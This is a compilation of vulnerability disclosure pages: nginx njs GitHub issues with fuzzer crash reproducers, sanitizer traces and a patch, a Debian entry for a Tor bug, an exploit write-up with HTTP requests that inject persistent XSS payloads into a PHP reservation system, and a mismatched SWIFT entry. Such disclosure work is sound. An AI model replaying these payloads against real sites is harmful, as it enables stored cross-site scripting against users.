Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_value_to_number at src/njs_value_conversion.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 74595E5A-F4AD-43DB-A4E9-34F2D366AD8A
    function placeholder(){}
    function main() {
    var v0 = /gL8?/;
    var v1 = {};
    var v2 = [v1,v1,v0];
    function v4(v5) {
        v2[1866532165] = undefined;
    }
    function v6(v7,v8) {
        function v10(v11) {
            v11[-4294967297] = Map;
        }
        var v13 = new Uint16Array(v2);
    }
    v1.valueOf = v4;
    var v15 = typeof Map;
    var v17 = typeof Map;
    var v19 = new Promise(v6);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==7855==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000063545b bp 0x7ffeac888710 sp 0x7ffeac8884e0 T0)
    ==7855==The signal is caused by a READ memory access.
    ==7855==Hint: address points to the zero page.
        #0 0x63545b in njs_value_to_number /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9
        #1 0x63545b in njs_typed_array_alloc /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:171:19
        #2 0x63a56b in njs_typed_array_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:229:13
        #3 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #4 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #6 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #7 0x573b65 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #8 0x573b65 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #9 0x648ed3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #10 0x648ed3 in njs_promise_constructor_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:214:11
        #11 0x648ed3 in njs_promise_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:164:15
        #12 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #13 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #14 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #17 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f8daaa33082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9 in njs_value_to_number
    ==7855==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34031: SEGV src/njs_value_conversion.h:17:9 in njs_value_to_number · Issue #523 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 811225C4-281E-48F6-8D83-E65B5DB8E211
    function placeholder(){}
    function main() {
    var v0 = "WbgAtnLEGv";
    var v2 = [10000,10000,10000,10000,10000];
    var v3 = 0.0;
    var v4 = undefined;
    var v6 = v2.includes();
    var v7 = 1;
    var v10 = NaN;
    var v11 = 3269;
    var v12 = "toUpperCase";
    var v14 = String["fromCharCode"](String,1156435285,String,3269);
    var v17 = `symbol${String}undefined${v14}number${v14}byteOffset${1156435285}e`["replace"](1156435285,v14);
    var v19 = Uint8ClampedArray.from(v17);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==9418==ERROR: AddressSanitizer: SEGV on unknown address 0x62505a68846a (pc 0x000000516e19 bp 0x7ffc9f96e8f0 sp 0x7ffc9f96e890 T0)
    ==9418==The signal is caused by a READ memory access.
        #0 0x516e19 in njs_utf8_next /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9
        #1 0x516e19 in njs_string_offset /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:2539:17
        #2 0x516e19 in njs_string_slice_string_prop /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1512:21
        #3 0x5176bf in njs_string_slice /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1544:5
        #4 0x4f35dd in njs_string_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:910:16
        #5 0x4f189b in njs_object_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:693:27
        #6 0x4f189b in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:622:15
        #7 0x4ef9fe in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:1058:11
        #8 0x63b787 in njs_value_property_i64 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.h:1087:12
        #9 0x63b787 in njs_typed_array_from /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:407:15
        #10 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #11 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #13 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #14 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #15 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #16 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #17 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #18 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #19 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #20 0x7f83cfee1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #21 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9 in njs_utf8_next
    ==9418==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34028: SEGV src/njs_utf8.h:52:9 in njs_utf8_next · Issue #522 · nginx/njs

Nginx NJS v0.7.4 was discovered to contain an out-of-bounds read via njs_scope_value at njs_scope.h.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 30, 2022

· 2 comments

Assignees

**Comments**

Environment

Commit  : 9f4ebc96148308a8ce12f2b54432c87e6d78b881
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

// Minimizing 34F6ED23-C193-452B-B724-E62BD7E15360
function placeholder(){}
function main() {
function v0(v1,v2,v3,v4,...v5) {
    try {
        async function v7(v8,v9,v10,v11) {
            var v12 \= await Proxy;
        }
        var v13 \= v0();
    } catch(v14) {
    } finally {
    }
    var v15 \= {};
    var v16 \= /gL8?/;
    var v17 \= {};
    var v18 \= \[v15,v17,v16\];
    function v20(v21) {
        v18\[1866532165\] \= Map;
    }
    async function v24(v25,v26) {
        var v27 \= await Map;
    }
    function v28(v29,v30) {
    }
    var v32 \= new Promise(v28);
    var v34 \= v32\["catch"\]();
    var v37 \= {"get":Promise,"set":v24};
    var v38 \= Object.defineProperty(v34,"constructor",v37);
    async function v39(v40,v41) {
        var v42 \= await v38;
    }
    var v43 \= v39();
    var v44 \= v20(Map);
}
var v45 \= v0();
}
main();

Minified

function run\_then() {}

function f(n) {
    if (n \== 2) {
        return;
    }

    try {
        f(n + 1);
    } catch(e) {
    }

    var p \= new Promise(run\_then);
    Object.defineProperty(p, "constructor", {get: () \=> ({}).a.a});
    async function g() {
        await p;
    }

    g();

    throw 'QQ';
}

f(0);

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004ff20b bp 0x7ffc7abf6030 sp 0x7ffc7abf5880 T0)
    ==815==The signal is caused by a READ memory access.
    ==815==Hint: address points to the zero page.
        #0 0x4ff20b in njs_scope_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12
        #1 0x4ff20b in njs_scope_valid_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:84:13
        #2 0x4ff20b in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:155:13
        #3 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #4 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #5 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #6 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #7 0x7f8dc7694082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #8 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 in njs_scope_value
    ==815==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_scope.h:74:12 Heap-based Buffer Overflow in njs\_scope\_value SEGV njs\_scope.h:74:12 Out-of-bounds Read in njs\_scope\_value

May 30, 2022

Copy link

Contributor

** **xeioex** commented Jun 2, 2022**

The patch

# HG changeset patch
# Parent  d63163569c25cb90fe654f0fedefde43553f833a
Fixed njs\_vmcode\_interpreter() when await fails.

Previously, while interpreting a user function, njs\_vmcode\_interpreter()
might return prematurely when an error happens in await instruction.
This is not correct because the current frame has to be unwound (or
exception caught) first.

The fix is exit through only 5 appropriate exit points to ensure
proper unwinding.

The patch correctly fixes issue reported in 07ef6c1f04f1 (0.7.3).

This closes #506 issue on Github.

diff --git a/src/njs\_vmcode.c b/src/njs\_vmcode.c
\--- a/src/njs\_vmcode.c
+++ b/src/njs\_vmcode.c
@@ -858,7 +858,12 @@ next:
 
                 njs\_vmcode\_debug(vm, pc, "EXIT AWAIT");
 
\-                return njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                ret = njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                if (njs\_slow\_path(ret == NJS\_ERROR)) {
+                    goto error;
+                }
+
+                return ret;
 
             case NJS\_VMCODE\_TRY\_START:
                 ret = njs\_vmcode\_try\_start(vm, value1, value2, pc);
@@ -1923,6 +1928,7 @@ njs\_vmcode\_await(njs\_vm\_t \*vm, njs\_vmcod
 
     value = njs\_scope\_valid\_value(vm, await->retval);
     if (njs\_slow\_path(value == NULL)) {
+        njs\_internal\_error(vm, "await->retval is invalid");
         return NJS\_ERROR;
     }
 

Yes, I check the patch is valid for #506,#508,#509,#510,#511,#512,#513,#514,#515,#516,#518,#519,#520,#521,#525,#526,#527,#528. @xeioex

2 participants

CVE-2022-34029: SEGV njs_scope.h:74:12 Out-of-bounds Read in njs_scope_value · Issue #506 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_djb_hash at src/njs_djb_hash.c.

Environment

Commit  : c756e23eb09dac519fe161c88587cc034306630f (high:1882)
Version : 0.7.5
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // Minimizing 8AC3654E-F5A1-405C-B380-951904AD058C
    function placeholder(){}
    function main() {
    var v1 = Function;
    var v6 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v8 = [v6,1050462187];
    var v11 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v13 = [v11,1050462187];
    var v15 = v11.__proto__;
    function v16(v17,v18,v19,...v20) {
        var v21 = [v17,-1000000000000.0];
        function v22(v23,v24,v25,...v26) {
            var v27 = {"d":v22};
            var v28 = Object.defineProperty(v15,v18,v27);
        }
        var v30 = v21["find"](v22);
    }
    var v32 = v13["find"](v16);
    var v34 = v6.__proto__;
    function v35(v36,v37,v38,...v39) {
        'use strict';
        var v40 = [v36,-1000000000000.0];
        var v42 = 471270.459031428 in v39;
        var v43 = 1000.0;
        var v45 = String.fromCodePoint();
        var v46 = -128;
        var v50 = `YVySS90U8G${v45}string${-452883207}-2${Uint8Array}dotAll`.indexOf();
        var v51 = 50691;
        var v52 = 658545.3967616097;
        var v53 = undefined;
        var v54 = -1.7976931348623157e+308;
        var v55 = 2147483647;
        var v56 = 4184750072;
        var v57 = "toString";
        var v58 = Float64Array;
        var v59 = "a";
        var v60 = 54444;
        var v61 = ["c14RHVOudV",1050462187];
        function v62(v63,v64,v65,...v66) {
            var v68 = v34["shift"]();
        }
        var v70 = v61["find"](v62);
        function v71(v72,v73,v74,...v75) {
            'use strict';
            var v76 = {"get":v71};
            var v77 = Object.defineProperty(v34,35017,v76);
        }
        var v79 = v40["find"](v71);
    }
    var v81 = v8["find"](v35);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2802==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004e312b bp 0x7ffca2668c70 sp 0x7ffca2668c40 T0)
    ==2802==The signal is caused by a READ memory access.
    ==2802==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4e312b in njs_djb_hash /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16
        #1 0x4f10cb in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:618:32
        #2 0x502d6a in njs_vmcode_property_in /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1431:11
        #3 0x502d6a in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:492:23
        #4 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #5 0x573a55 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #6 0x573a55 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #7 0x560b05 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #8 0x560b05 in njs_array_iterator_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:1918:12
        #9 0x560b05 in njs_array_handler_find /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2025:11
        #10 0x65b9ea in njs_object_iterate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_iterator.c
        #11 0x554e0f in njs_array_prototype_iterator /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2297:11
        #12 0x57599e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:739:11
        #13 0x573d0c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:777:16
        #14 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573d3f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #17 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f1db1e4a082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16 in njs_djb_hash
    ==2802==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34030: SEGV src/njs_djb_hash.c:21:16 in njs_djb_hash · Issue #540 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

Jun 1, 2022

· 0 comments

**Comments**

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 9159992D-C762-4DEB-8981-8A3357935A7A
    function placeholder(){}
    function main() {
    var v2 = [];
    var v4 = {"get":Number};
    var v6 = Object.defineProperty(v2,29425,v4);
    var v7 = AggregateError(v6);
    Object.e = v7;
    var v9 = Promise();
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==8116==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004eed5c bp 0x7ffcc19b6310 sp 0x7ffcc19b61e0 T0)
    ==8116==The signal is caused by a READ memory access.
    ==8116==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4eed5c in njs_value_own_enumerate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21
        #1 0x53a37f in njs_object_traverse /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:1230:23
        #2 0x5a16ed in njs_builtin_match_native_function /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_builtin.c:776:11
        #3 0x592ad4 in njs_add_backtrace_entry /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:1308:15
        #4 0x592ad4 in njs_error_stack_new /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:102:16
        #5 0x592ad4 in njs_error_stack_attach /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:161:11
        #6 0x50506e in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1007:16
        #7 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #8 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #9 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #10 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #11 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #12 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #13 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #14 0x7f0a16923082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #15 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21 in njs_value_own_enumerate
    ==8116==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

2 participants

CVE-2022-34032: SEGV src/njs_value.c:240:21 in njs_value_own_enumerate · Issue #524 · nginx/njs

Tor 0.4.7.x before 0.4.7.8 allows a denial of service via the wedging of RTT estimation.

**Name**

CVE-2022-33903

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues, web search, more)

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

tor (PTS)

buster, buster (security)

0.3.5.16-1

fixed

bullseye (security), bullseye

0.4.5.10-1~deb11u1

fixed

bookworm, sid

0.4.7.8-1

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

tor

source

stretch

(not affected)

tor

source

buster

(not affected)

tor

source

bullseye

(not affected)

tor

source

(unstable)

0.4.7.8-1

**Notes**

\[bullseye\] - tor <not-affected> (Only affects 0.4.7.x)  
\[buster\] - tor <not-affected> (Only affects 0.4.7.x)  
\[stretch\] - tor <not-affected> (Only affects 0.4.7.x)  
https://bugzilla.redhat.com/show\_bug.cgi?id=2099227  
https://gitlab.torproject.org/tpo/core/tor/-/issues/40626  
https://lists.torproject.org/pipermail/tor-announce/2022-June/000242.html  
https://github.com/torproject/tor/commit/b0496d40197dd5b4fb7b694c1410082d4e34dda6 (tor-0.4.7.8)

CVE-2022-33903: CVE-2022-33903

Cross Site Scripting (XSS) vulnerability in sourcecodester Multi Restaurant Table Reservation System 1.0 via the Restaurant Name field to /dashboard/profile.php.

**Exploit Title: Multi Restaurant Table Reservation System - Multiple Persistent XSS****Date: 01-11-2020****Exploit Author: yunaranyancat****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip****Version: 1.0****Tested on: Ubuntu 18.04 + XAMPP 7.4.11**

Summary:

Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities.

**1.CVE-2020-35261**

Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field

**Sample request POC #1**

    POST /TableReservation/dashboard/profile.php HTTP/1.1
    Host: [TARGET URL/IP]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 122
    Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save
    

**2.CVE-2020-36550**

Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php

**Sample request POC #2**

    POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
    Host: [TARGET URL/IP]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php
    Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622
    Content-Length: 321
    Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------424640138424818065256966622
    Content-Disposition: form-data; name="tablename"
    
    <script>alert("XSS")</script>
    -----------------------------424640138424818065256966622
    Content-Disposition: form-data; name="addtable"
    
    Add Table
    -----------------------------424640138424818065256966622--
    

**3.CVE-2020-36551**

Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Item Name field in menu-add.php

**4.CVE-2020-36552**

Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php

**5.CVE-2020-36553**

Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food\_type) dropdown to XSS payload in menu-add.php

**Sample request POC #3, #4 & #5**

    POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
    Host: [TARGET URL/IP]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php
    Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499
    Content-Length: 6641
    Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="itemname"
    
    <script>alert("XSS1")</script>
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="price"
    
    1
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="madeby"
    
    <svg onload=alert("XSS2")>
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="food_type"
    
    <svg onload=prompt("XSS4")>
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="image"; filename="image.jpeg"
    Content-Type: image/jpeg
    
    ..
    [REDACTED CONTENT OF image.jpeg]
    ..
    
    ----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="addItem"
    
    Add Item
    -----------------------------165343425917898292661480081499--

CVE-2020-35261: poc-dump/MultiRestaurantReservationSystem/1.0 at main · yunaranyancat/poc-dump

Isode SWIFT v4.0.2 was discovered to contain hard-coded credentials in the Registry Editor. This allows attackers to access sensitive information such as user credentials and certificates.

**Swift (Linux)**

To install and stay up to date with the latest prereleases on Ubuntu Linux and Debian, you can add the following APT lines (depending on your distribution) to the list of Software Sources in Synaptic Package Manager or /etc/apt/sources.list.

Ubuntu Xenial Xerus (16.04)

deb https://swift.im/packages/ubuntu/xenial release main  
deb-src https://swift.im/packages/ubuntu/xenial release main

Ubuntu Artful Aardvark (17.10)

deb https://swift.im/packages/ubuntu/artful release main  
deb-src https://swift.im/packages/ubuntu/artful release main

Debian 8 (jessie)

deb https://swift.im/packages/debian/jessie release main  
deb-src https://swift.im/packages/debian/jessie release main

Debian 9 (stretch)

deb https://swift.im/packages/debian/stretch release main  
deb-src https://swift.im/packages/debian/stretch release main

